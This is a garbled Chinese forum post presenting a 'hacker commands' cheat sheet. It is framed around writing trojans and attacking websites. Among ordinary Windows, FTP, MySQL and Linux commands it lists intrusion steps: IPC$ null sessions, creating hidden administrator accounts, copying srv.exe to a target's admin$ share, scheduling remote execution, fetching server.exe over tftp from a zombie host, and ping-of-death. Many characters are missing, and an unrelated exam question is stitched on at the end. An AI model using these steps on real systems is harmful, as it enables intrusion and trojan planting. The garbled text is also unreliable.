又有人来灌水了勿删勿删DOS... - -.弄手册,该用时候翻下....我菜鸟,下我看法先C,再了解下C++面向对象程序设计. 了解API,学汇编 刻苦点能写出木马来了.汇编还能用于免杀.php SQL 些攻击网站必学.只了解多,希望对有点帮助上多够学好久了..net use \\ip\ipc$ " " /user:" " 建立IPC空链接 net use \\ip\ipc$ "密码" /user:"用户名" 建立IPC非空链接 net use h: \\ip\c$ "密码" /user:"用户名" 直接登陆映射对方C:本地H: net use h: \\ip\c$ 登陆映射对方C:本地H: net use \\ip\ipc$ /del 删除IPC链接 net use h: /del 删除映射对方本地H:映射 net user 用户名 密码 /add 建立用户 net user guest /active:yes 激活guest用户 net user 查看有哪些用户 net user 帐户名 查看帐户属性 net localgroup administrators 用户名 /add 把用户添加管理员使其具有管理员权限,注意:administrator加s用复数 net start 查看开启了哪些服务 net start 服务名 开启服务;(:net start telnet net start schedule) net stop 服务名 停止某服务 net time \\目标ip 查看对方时间 net time \\目标ip /set 设置本地计算机时间与目标IP主机时间同步,加上参数/yes取消确认信息 net view 查看本地局域网内开启了哪些共享 net view \\ip 查看对方局域网内开启了哪些共享 net config 显示系统网络设置 net logoff 断开连接共享 net pause 服务名 暂停某服务 net send ip "文本信息" 向对方发信息 net ver 局域网内正使用网络连接类型和信息 net share 查看本地开启共享 net share ipc$ 开启ipc$共享 net share ipc$ /del 删除ipc$共享 net share c$ /del 删除C:共享 net user guest 12345 用guest用户登陆用密码改12345 net password 密码 更改系统登陆密码 netstat -a 查看开启了哪些端口,常用netstat -an netstat -n 查看端口网络连接情况常用netstat -an netstat -v 查看正进行工作 netstat -p 协议名 例:netstat -p tcq/ip 查看某协议使用情况(查看tcp/ip协议使用情况) netstat -s 查看正使用所有协议使用情况 nbtstat -A ip 对方136139其端口开了查看对方近登陆用户名(03前用户名)-注意:参数-A要大写 tracert -参数 ip(或计算机名) 跟踪路由(数据包)参数:-w数字用于设置超时间隔 ping ip(或域名) 向对方主机发送默认大小32字节数据参数:-l[空格]数据包大小;-n发送数据次数;-t指直ping ping -t -l 65550 ip 死亡之ping(发送大于64K文件并直ping成了死亡之ping) ipconfig (winipcfg) 用于windows NT及XP(windows 95 98)查看本地ip地址ipconfig用参数/all显示全部配置信息 tlist -t 树行列表显示进程(系统附加工具默认没有安装安装目录Support/tools文件夹内) kill -F 进程名 加-F参数强制结束某进程(系统附加工具默认没有安装安装目录Support/tools文件夹内) del -F 文件名 加-F参数删除只读文件,/AR、/AH、/AS、/AA分别表示删除只读、隐藏、系统、存档文件/A-R、/A-H、/A-S、/A-A表示删除除只读、隐藏、系统、存档外文件例DEL/AR *.*表示删除当前目录下所有只读文件DEL/A-S *.*表示删除当前目录下除系统文件外所有文件 del /S /Q 目录 或用:rmdir /s /Q 目录 /S删除目录及目录下所有子目录和文件同时使用参数/Q 取消删除 *** 作时系统确认直接删除(二命令作用相同) move 盘符\路径\要移动文件名 存放移动文件路径\移动文件名 移动文件,用参数/y取消确认移动目录存相同文件提示直接覆盖 fc one.txt two.txt > 3st.txt 对比二文件并把同之处输出3st.txt文件"> "和"> >" 重定向命令 at id号 开启已注册某计划任务 at /delete 停止所有计划任务用参数/yes则需要确认直接停止 at id号 /delete 停止某已注册计划任务 at 查看所有计划任务 at \\ip time 程序名(或命令) /r 某时间运行对方某程序并重新启动计算机 finger username @host 查看近有哪些用户登陆 telnet ip 端口 远和登陆服务器,默认端口23 open ip 连接IP(属telnet登陆命令) telnet 本机上直接键入telnet 进入本机telnet copy 路径\文件名1 路径\文件名2 /y 复制文件1指定目录文件2用参数/y同时取消确认要改写份现存目录文件 copy c:\srv.exe \\ip\admin$ 复制本地c:\srv.exe对方admin下 cppy 1st.jpg/b+2st.txt/a 3st.jpg 2st.txt内容藏身1st.jpg生成3st.jpg新文件注:2st.txt文件头要空三排参数:/b指二进制文件/a指ASCLL格式文件 copy \\ip\admin$\svv.exe c:\ 或:copy\\ip\admin$\*.* 复制对方admini$共享下srv.exe文件(所有文件)至本地C: xcopy 要复制文件或目录树 目标地址\目录名 复制文件和目录树用参数/Y提示覆盖相同文件 tftp -i 自己IP(用肉机作跳板时用肉机IP) get server.exe c:\server.exe 登陆IPserver.exe下载目标主机c:\server.exe 参数:-i指二进制模式传送传送exe文件时用加-i 则ASCII模式(传送文本文件模式)进行传送 tftp -i 对方IP put c:\server.exe 登陆上传本地c:\server.exe至主机 ftp ip 端口 用于上传文件至服务器或进行文件 *** 作默认端口21bin指用二进制方式传送(执行文件进);默认ASCII格式传送(文本文件时) route print 显示出IP路由主要显示网络地址Network addres子网掩码Netmask网关地址Gateway addres接口地址Interface arp 查看和处理ARP缓存ARP名字解析意思负责把IP解析成物理性MAC地址arp -a显示出全部信息 start 程序名或命令 /max 或/min 新开新窗口并大化(小化)运行某程序或命令 mem 查看cpu使用情况 attrib 文件名(目录名) 查看某文件(目录)属性 attrib 文件名 -A -R -S -H 或 +A +R +S +H 去掉(添加)某文件 存档只读系统隐藏 属性;用+则添加某属性 dir 查看文件参数:/Q显示文件及目录属系统哪用户/T:C显示文件创建时间/T:A显示文件上次被访问时间/T:W上次被修改时间 date /t 、 time /t 使用此参数即DATE/T、TIME/T只显示当前日期和时间而必输入新日期和时间 set 指定环境变量名称=要指派给变量字符 设置环境变量 set 显示当前所有环境变量 set p(或其字符) 显示出当前字符p(或其字符)开头所有环境变量 pause 暂停批处理程序并显示出:请按任意键继续.... if 批处理程序执行条件处理(更多说明见if命令及变量) goto 标签 cmd.exe导向批处理程序带标签行(标签必须单独行且冒号打头例::start标签) call 路径\批处理文件名 从批处理程序调用另批处理程序 (更多说明见call /?) for 对组文件每文件执行某特定命令(更多说明见for命令及变量) echo on或off 打开或关闭echo仅用echo加参数则显示当前echo设置 echo 信息 屏幕上显示出信息 echo 信息 >> pass.txt "信息"保存pass.txt文件 findstr "Hello" aa.txt aa.txt文件寻找字符串hello find 文件名 查找某文件 title 标题名字 更改CMD窗口标题名字 color 颜色值 设置cmd控制台前景和背景颜色;0=黑、1=蓝、2=绿、3=浅绿、4=红、5=紫、6=黄、7=白、8=灰、9=淡蓝、A=淡绿、B=淡浅绿、C=淡红、D=淡紫、E=淡黄、F=亮白 prompt 名称 更改cmd.exe显示命令提示符(把C:\、D:\统改:EntSky\ ) print 文件名 打印文本文件 ver DOS窗口下显示版本信息 winver d出窗口显示版本信息(内存大小、系统版本、补丁版本、计算机名) format 盘符 /FS:类型 格式化磁盘,类型:FAT、FAT32、NTFS ,例:Format D: /FS:NTFS md 目录名 创建目录 replace 源文件 要替换文件目录 替换文件 ren 原文件名 新文件名 重命名文件名 tree 树形结构显示出目录用参数-f 列出第文件夹文件名称 type 文件名 显示文本文件内容 more 文件名 逐屏显示输出文件 doskey 要锁定命令=字符doskey 要解锁命令= DOS提供锁定命令(编辑命令行重新调用win2k命令并创建宏):锁定dir命令:doskey dir=entsky (能用doskey dir=dir);解锁:doskey dir= taskmgr 调出任务管理器 chkdsk /F D: 检查磁盘D并显示状态报告;加参数/f并修复磁盘上错误 tlntadmn telnt服务admn,键入tlntadmn选择3再选择8,更改telnet服务默认端口23其任何端口 exit 退出cmd.exe程序或目前用参数/B则退出当前批处理脚本而cmd.exe path 路径\执行文件文件名 执行文件设置路径 cmd 启动win2K命令解释窗口参数:/eff、/en 关闭、开启命令扩展;更我详细说明见cmd /? regedit /s 注册表文件名 导入注册表;参数/S指安静模式导入无任何提示; regedit /e 注册表文件名 导出注册表 cacls 文件名 参数 显示或修改文件访问控制列表(ACL)--针对NTFS格式时参数:/D 用户名:设定拒绝某用户访问;/P 用户名:perm 替换指定用户访问权限;/G 用户名:perm 赋予指定用户访问权限;Perm : N 无R 读取 W 写入 C 更改(写入)F 完全控制;例:cacls D:\test.txt /D pub 设定d:\test.txt拒绝pub用户访问 cacls 文件名 查看文件访问用户权限列表 REM 文本内容 批处理文件添加注解 netsh 查看或更改本地网络配置情况IIS服务命令:iisreset /reboot 重启win2k计算机(有提示系统重启信息出现) iisreset /start或stop 启动(停止)所有Internet服务 iisreset /restart 停止重新启动所有Internet服务 iisreset /status 显示所有Internet服务状态 iisreset /enable或disable 本地系统上启用(禁用)Internet服务重新启动 iisreset /rebootonerror 当启动、停止或重新启动Internet服务时若发生错误重新开机 iisreset /noforce 若无法停止Internet服务会强制终止Internet服务 iisreset /timeout Val达逾时间(秒)时仍未停止Internet服务若指定/rebootonerror参数则电脑会重新开机预设值重新启动20秒停止60秒重新开机0秒 FTP 命令: (面有详细说明内容) ftp命令行格式:ftp -v -d -i -n -g[主机名] -v 显示远程服务器所有响应信息-d 使用调试方式 -n 限制ftp自动登录,即使用.netrc文件-g 取消全局文件名 help [命令] 或 [命令] 查看命令说明 bye 或 quit 终止主机FTP进程,并退出FTP管理方式. pwd 列出当前远端主机目录 put 或 send 本地文件名 [上传主机上文件名] 本地文件传送至远端主机 get 或 recv [远程主机文件名] [下载本地文件名] 从远端主机传送至本地主机 mget [remote-files] 从远端主机接收批文件至本地主机 mput local-files 本地主机批文件传送至远端主机 dir 或 ls [remote-directory] [local-file] 列出当前远端主机目录文件.有本地文件,结写至本地文件 ascii 设定ASCII方式传送文件(缺省值) bin 或 image 设定二进制方式传送文件 bell 每完成次文件传送,报警提示 cdup 返回上级目录 close 断与远程服务器ftp会(与open对应) open host[port] 建立指定ftp服务器连接,指定连接端口 delete 删除远端主机文件 mdelete [remote-files] 删除批文件 mkdir directory-name 远端主机建立目录 rename [from] [to] 改变远端主机文件名 rmdir directory-name 删除远端主机目录 status 显示当前FTP状态 system 显示远端主机系统类型 user user-name [password] [account] 重新别用户名登录远端主机 open host [port] 重新建立新连接 prompt 交互提示模式 macdef 定义宏命令 lcd 改变当前本地主机工作目录,缺省,转当前用户HOME目录 chmod 改变远端主机文件权限 case 当ON时,用MGET命令拷贝文件名本地机器,全部转换小写字母 cd remote-dir 进入远程主机目录 cdup 进入远程主机目录父目录 ! 本地机执行交互shellexit回ftp环境,!ls*.zip MYSQL 命令: mysql -h主机地址 -u用户名 -p密码 连接MYSQL;刚安装好MYSQL超级用户root没有密码(例:mysql -h110.110.110.110 -Uroot -P123456 注:u与root用加空格其也样) exit 退出MYSQL mysqladmin -u用户名 -p旧密码 password 新密码 修改密码 grant select on 数据库.* to 用户名@登录主机 identified by \"密码\"; 增加新用户(注意:和上面同下面因MYSQL环境命令所面都带分号作命令结束符) show databases; 显示数据库列表刚开始时才两数据库:mysql和testmysql库重要里面有MYSQL系统信息我们改密码和新增用户实际上用库进行 *** 作 use mysql;show tables; 显示库数据表 describe 表名; 显示数据表结构 create database 库名; 建库 use 库名;create table 表名 (字段设定列表); 建表 drop database 库名; drop table 表名; 删库和删表 delete from 表名; 表记录清空 select * from 表名; 显示表记录 mysqldump --opt school>school.bbb 备份数据库:(命令DOS\\mysql\\bin目录下执行);注释:数据库school备份school.bbb文件school.bbb文本文件文件名任取打开看看会有新发现 win2003系统下新增命令(实用部份): shutdown /参数 关闭或重启本地或远程主机参数说明:/S 关闭主机/R 重启主机 /T 数字 设定延时时间范围0~180秒之间 /A取消开机/M //IP 指定远程主机例:shutdown /r /t 0 立即重启本地主机(无延时) taskill /参数 进程名或进程pid 终止或多任务和进程参数说明:/PID 要终止进程pid,用tasklist命令获得各进程pid/IM 要终止进程进程名/F 强制终止进程/T 终止指定进程及所启动子进程 tasklist 显示当前运行本地和远程主机上进程、服务、服务各进程进程标识符(PID)参数说明:/M 列出当前进程加载dll文件/SVC 显示出每进程对应服务无参数时只列出当前进程Linux系统下基本命令: 要区分大小写uname 显示版本信息(同win2K ver) dir 显示当前目录文件,ls -al 显示包括隐藏文件(同win2K dir) pwd 查询当前所目录位置 cd cd ..回上层目录注意cd 与..之间有空格cd /返回根目录 cat 文件名 查看文件内容 cat >abc.txt 往abc.txt文件写上内容 more 文件名 页页方式显示文本文件 cp 复制文件 mv 移动文件 rm 文件名 删除文件rm -a 目录名删除目录及子目录 mkdir 目录名 建立目录 rmdir 删除子目录目录内没有文档 chmod 设定档案或目录存取权限 grep 档案查找字符串 diff 档案文件比较 find 档案搜寻 date 现日期、时间 who 查询目前和使用同台机器人及Login时间地点 w 查询目前上机者详细资料 whoami 查看自己帐号名称 groups 查看某人Group passwd 更改密码 history 查看自己下过命令 ps 显示进程状态 kill 停止某进程 gcc 黑客通常用来编译C语言写文件 su 权限转换指定使用者 telnet IP telnet连接对方主机(同win2K)当出现bash$时说明连接成功 ftp ftp连接上某服务器(同win2K上都黑客常用DOS命令...
2009年南京师范大学在职研究生政治有考纲吗欢迎分享,转载请注明来源:内存溢出
微信扫一扫
支付宝扫一扫
评论列表(0条)